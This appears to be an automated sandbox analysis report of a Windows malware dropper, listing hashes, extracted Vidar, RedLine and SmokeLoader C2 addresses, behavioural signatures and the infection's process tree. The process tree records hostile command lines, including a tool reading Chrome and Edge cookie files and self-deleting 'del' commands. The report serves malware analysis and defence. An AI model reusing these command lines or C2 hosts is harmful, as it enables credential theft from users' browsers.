Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1362s
  • max time network
    1824s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    05-08-2021 17:08

General

  • Target

    8 (17).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

redline

Botnet

45k_ERA

C2

45.14.49.117:14251

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k R

C2

densalenge.xyz:80

Extracted

Family

redline

Botnet

Version 8.02

C2

149.202.65.221:64206

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2620
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2852
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2628
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
          • Modifies registry class
          PID:2424
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2416
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1844
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1252
                • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
                  "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3932
                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1788
                    • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\setup_install.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\setup_install.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2524
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2152
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.exe
                          sonia_1.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2300
                          • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_1.exe" -a
                            6⤵
                            • Executes dropped EXE
                            PID:4060
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2288
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_2.exe
                          sonia_2.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3928
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3880
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_3.exe
                          sonia_3.exe
                          5⤵
                          • Executes dropped EXE
                          • Modifies system certificate store
                          PID:3140
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 916
                            6⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4556
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3696
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_4.exe
                          sonia_4.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2232
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4032
                        • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_5.exe
                          sonia_5.exe
                          5⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          PID:2220
                          • C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe
                            "C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4732
                            • C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe
                              C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe
                              7⤵
                              • Executes dropped EXE
                              PID:2648
                            • C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe
                              C:\Users\Admin\Documents\Wz1HlqcHwg30q4kEwL0AnA10.exe
                              7⤵
                              • Executes dropped EXE
                              PID:196
                          • C:\Users\Admin\Documents\JH2RxLu7F95XPNe_0cmmxFNm.exe
                            "C:\Users\Admin\Documents\JH2RxLu7F95XPNe_0cmmxFNm.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4724
                          • C:\Users\Admin\Documents\MXZJVkHDxisqV_fJFweaE1bN.exe
                            "C:\Users\Admin\Documents\MXZJVkHDxisqV_fJFweaE1bN.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4824
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              7⤵
                                PID:4644
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  8⤵
                                  • Kills process with taskkill
                                  PID:5248
                            • C:\Users\Admin\Documents\nK3zcoq03x6ps4lvYkLRZCwd.exe
                              "C:\Users\Admin\Documents\nK3zcoq03x6ps4lvYkLRZCwd.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:4800
                              • C:\Users\Admin\Documents\nK3zcoq03x6ps4lvYkLRZCwd.exe
                                C:\Users\Admin\Documents\nK3zcoq03x6ps4lvYkLRZCwd.exe
                                7⤵
                                • Executes dropped EXE
                                PID:4808
                            • C:\Users\Admin\Documents\PNQWJuCIMGFb7fEh7_4ELBKd.exe
                              "C:\Users\Admin\Documents\PNQWJuCIMGFb7fEh7_4ELBKd.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4764
                            • C:\Users\Admin\Documents\iB0qO2AJlR4nFUZyAsS0uK4b.exe
                              "C:\Users\Admin\Documents\iB0qO2AJlR4nFUZyAsS0uK4b.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4912
                            • C:\Users\Admin\Documents\bZwOF8GkFceGkLqx8WiVoPKi.exe
                              "C:\Users\Admin\Documents\bZwOF8GkFceGkLqx8WiVoPKi.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4868
                            • C:\Users\Admin\Documents\nIxSXYYS0aZVZFyvSjvdSd7j.exe
                              "C:\Users\Admin\Documents\nIxSXYYS0aZVZFyvSjvdSd7j.exe"
                              6⤵
                              • Executes dropped EXE
                              • Modifies registry class
                              PID:4972
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                  PID:5684
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4768
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                    PID:5788
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                      PID:5212
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:3308
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:5512
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                            PID:4696
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:5384
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:1004
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:3308
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:2280
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:5772
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:5288
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:5060
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:4048
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:2580
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:5972
                                                            • C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe
                                                              "C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4200
                                                              • C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe
                                                                "C:\Users\Admin\Documents\23CoLt21sWWxbdrJymaW6CCS.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:5004
                                                            • C:\Users\Admin\Documents\naECF6hvtd8hb1EiDg5IZtNJ.exe
                                                              "C:\Users\Admin\Documents\naECF6hvtd8hb1EiDg5IZtNJ.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:928
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 672
                                                                7⤵
                                                                • Program crash
                                                                PID:2136
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 652
                                                                7⤵
                                                                • Program crash
                                                                PID:4300
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 680
                                                                7⤵
                                                                • Program crash
                                                                PID:4276
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 548
                                                                7⤵
                                                                • Program crash
                                                                PID:4416
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 1088
                                                                7⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:3928
                                                            • C:\Users\Admin\Documents\oiYPr6lwjQrDxK9z0HXQK1hx.exe
                                                              "C:\Users\Admin\Documents\oiYPr6lwjQrDxK9z0HXQK1hx.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:3836
                                                            • C:\Users\Admin\Documents\aBm8OQA_gGMlL_ypW24zSg0S.exe
                                                              "C:\Users\Admin\Documents\aBm8OQA_gGMlL_ypW24zSg0S.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4656
                                                              • C:\Users\Admin\AppData\Local\Temp\is-DH5CS.tmp\aBm8OQA_gGMlL_ypW24zSg0S.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-DH5CS.tmp\aBm8OQA_gGMlL_ypW24zSg0S.tmp" /SL5="$10284,138429,56832,C:\Users\Admin\Documents\aBm8OQA_gGMlL_ypW24zSg0S.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:2808
                                                                • C:\Users\Admin\AppData\Local\Temp\is-NL57O.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-NL57O.tmp\Setup.exe" /Verysilent
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:5576
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:5204
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      10⤵
                                                                        PID:4484
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        10⤵
                                                                          PID:5312
                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          10⤵
                                                                            PID:5856
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            10⤵
                                                                              PID:5612
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:5220
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                              10⤵
                                                                              • Executes dropped EXE
                                                                              PID:5920
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:5236
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                              10⤵
                                                                                PID:5380
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im GameBox64bit.exe /f
                                                                                  11⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4668
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /t 6
                                                                                  11⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:5712
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              PID:5276
                                                                              • C:\Users\Admin\AppData\Roaming\1322172.exe
                                                                                "C:\Users\Admin\AppData\Roaming\1322172.exe"
                                                                                10⤵
                                                                                • Executes dropped EXE
                                                                                PID:5412
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 5412 -s 1932
                                                                                  11⤵
                                                                                  • Program crash
                                                                                  PID:1868
                                                                              • C:\Users\Admin\AppData\Roaming\4279560.exe
                                                                                "C:\Users\Admin\AppData\Roaming\4279560.exe"
                                                                                10⤵
                                                                                  PID:744
                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                    11⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4424
                                                                                • C:\Users\Admin\AppData\Roaming\6704874.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\6704874.exe"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3432
                                                                                • C:\Users\Admin\AppData\Roaming\7123584.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\7123584.exe"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4716
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                9⤵
                                                                                • Executes dropped EXE
                                                                                • Checks whether UAC is enabled
                                                                                • Drops file in Program Files directory
                                                                                PID:5352
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                9⤵
                                                                                • Executes dropped EXE
                                                                                PID:5384
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KPVRG.tmp\GameBoxWin32.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KPVRG.tmp\GameBoxWin32.tmp" /SL5="$402DC,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5468
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LRL3T.tmp\Daldoula.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LRL3T.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                    11⤵
                                                                                    • Drops file in Drivers directory
                                                                                    • Adds Run key to start application
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4368
                                                                                    • C:\Program Files\Java\KOPICDJZFB\ultramediaburner.exe
                                                                                      "C:\Program Files\Java\KOPICDJZFB\ultramediaburner.exe" /VERYSILENT
                                                                                      12⤵
                                                                                        PID:5344
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0N397.tmp\ultramediaburner.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0N397.tmp\ultramediaburner.tmp" /SL5="$802FE,281924,62464,C:\Program Files\Java\KOPICDJZFB\ultramediaburner.exe" /VERYSILENT
                                                                                          13⤵
                                                                                          • Drops file in Program Files directory
